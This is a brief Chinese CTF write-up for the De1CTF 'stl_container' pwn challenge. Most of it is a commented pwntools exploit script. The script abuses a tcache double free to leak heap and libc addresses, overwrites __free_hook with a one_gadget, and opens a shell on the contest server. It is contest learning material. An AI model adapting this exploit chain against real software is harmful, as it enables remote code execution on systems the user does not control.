爆0选手一号准备就绪,菜鸟打不动De1CTF
stl_container
只做了一个签到题,作为一个签到选手,mips不会做,安卓也不会,连游戏MC也没玩过,只能做一个签到题才能勉强更新出这一页(其实半页都没有)
题目不难,tcache结构下,在free(2,0)处可以两次free
1 | from pwn import* |
def new(ch,content):
    """Drive the challenge menu to allocate a new entry.

    Selects container *ch* at the first ``>>`` prompt, picks menu action
    ``'1'`` at the second (the "add" action, going by this helper's name),
    then writes *content* raw (no trailing newline) at the ``data:`` prompt.
    Uses the module-level tube ``p``.
    """
    menu_steps = (('>>', str(ch)), ('>>', '1'))
    for prompt, answer in menu_steps:
        p.sendlineafter(prompt, answer)
    # sendafter, not sendlineafter: payloads here carry binary bytes and
    # must not get a newline appended.
    p.sendafter('data:', content)
def free(ch,index):
    """Drive the challenge menu to delete an entry from container *ch*.

    Picks menu action ``'2'`` (the "delete" action, going by this helper's
    name). Containers 3 and 4 are not asked for an index by the binary, so
    *index* is only sent for containers 1 and 2. Uses the module-level tube ``p``.
    """
    p.sendlineafter('>>', str(ch))
    p.sendlineafter('>>', '2')
    wants_index = ch not in (3, 4)
    if wants_index:
        p.sendlineafter('index?', str(index))
def show(ch,index):
    """Drive the challenge menu to print an entry from container *ch*.

    Picks menu action ``'3'`` (the "show" action, going by this helper's
    name). As in ``free``, containers 3 and 4 take no index, so *index* is
    only sent for containers 1 and 2. The caller reads the echoed bytes from
    the module-level tube ``p`` afterwards.
    """
    p.sendlineafter('>>', str(ch))
    p.sendlineafter('>>', '3')
    wants_index = ch not in (3, 4)
    if wants_index:
        p.sendlineafter('index?', str(index))
# Verbose pwntools logging: every send/recv on the tube is printed, which is
# what makes the two leaks below easy to eyeball during a run.
context.log_level ='DEBUG'
# NOTE(review): the local process() handle is immediately rebound to the
# remote() connection and never closed, so a stray ./main is left running.
# Normally one of these two lines is commented out when switching targets.
p = process('./main')
p = remote('134.175.239.26',8848)
# Symbol offsets (__malloc_hook, __free_hook) come from the libc shipped with
# the challenge; the offset arithmetic below assumes exactly this build.
libc =ELF('./libc-2.27.so')

# --- Stage 1: heap leak -------------------------------------------------------
# Container 3 gets 0x80 zero bytes followed by a fake chunk header (prev_size 0,
# size 0xA1). The purpose of this forged header is not visible from the script
# alone; presumably it sets up a valid-looking chunk for a later free.
new(3,'\x00'*0x80 + p64(0) + p64(0xA1))
new(1,'FMYY')
new(1,'FMYY')
new(2,'FMYY')
# Free entry 0 of container 2, then allocate into it again writing a single
# byte. The byte lands on the first qword of the freed chunk (its tcache next
# pointer in glibc 2.27), so only the low byte changes; show() then echoes the
# rest of that pointer back.
free(2,0)
new(2,'\xB0')
show(2,0)
p.recvuntil('data: ')
# Leaked pointer minus its (empirically determined) offset into the heap
# mapping. 0x124B0 is specific to this binary/libc — TODO confirm on rerun.
heap_base = u64(p.recvuntil('\n',drop=True).ljust(8,'\x00')) - 0x124B0
log.info('HEAP:\t' + hex(heap_base))

# --- Stage 2: libc leak -------------------------------------------------------
new(2,'FMYY')
new(3,'FMYY')
new(4,'FMYY')
# Container 4 gets 0x50 zero bytes plus a second fake header (size 0x41),
# again presumably to make the heap layout consistent for the later free.
new(4,'\x00'*0x50 + p64(0) + p64(0x41))
# The write-up notes free(2,0) can be issued twice: the entry is not cleared
# after the first delete, so the same chunk is freed into tcache twice.
free(2,0)
free(2,0)
# First allocation returns the doubly-freed chunk and overwrites its next
# pointer with a chosen heap address; the second allocation is therefore
# served from heap_base + 0x125E0 and writes a fake size of 0x421 there.
new(2,p64(heap_base + 0x125E0))
# 0x421 exceeds the tcache size limit, so the chunk whose header this is
# will go to the unsorted bin (not tcache) when freed below, leaving
# main_arena pointers in its user data.
new(2,p64(0) + p64(0x421))
free(1,0)
# Re-allocate and print the entry to read back the arena pointer left by the
# unsorted-bin free.
new(1,'FMYY')
show(1,0)
p.recvuntil('data: ')
# Read up to the 0x7F byte that terminates a userland libc address, keep the
# last 6 bytes. In glibc 2.27 the unsorted-bin head sits at main_arena + 0x60
# and main_arena is __malloc_hook + 0x10, hence the two constants.
# NOTE: str/bytes mixing in .ljust(8,'\x00') means this is Python 2 pwntools.
libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - 0x60 -0x10 - libc.sym['__malloc_hook']
log.info('LIBC:\t' + hex(libc_base))

# --- Stage 3: hook overwrite --------------------------------------------------
free_hook = libc_base + libc.sym['__free_hook']
# 0x4F322 is an offset into the bundled libc-2.27; going by the variable name
# it is a gadget that spawns a shell. It is libc-build specific.
rce = libc_base + 0x4F322
# Same double-free / tcache-poison sequence as in stage 2, this time pointing
# the next allocation at __free_hook so the second new() writes `rce` there.
free(2,0)
free(2,0)
new(2,p64(free_hook))
new(2,p64(rce))
# Any subsequent free() in the target now dispatches through the hook; hand
# the tube to the user.
p.interactive()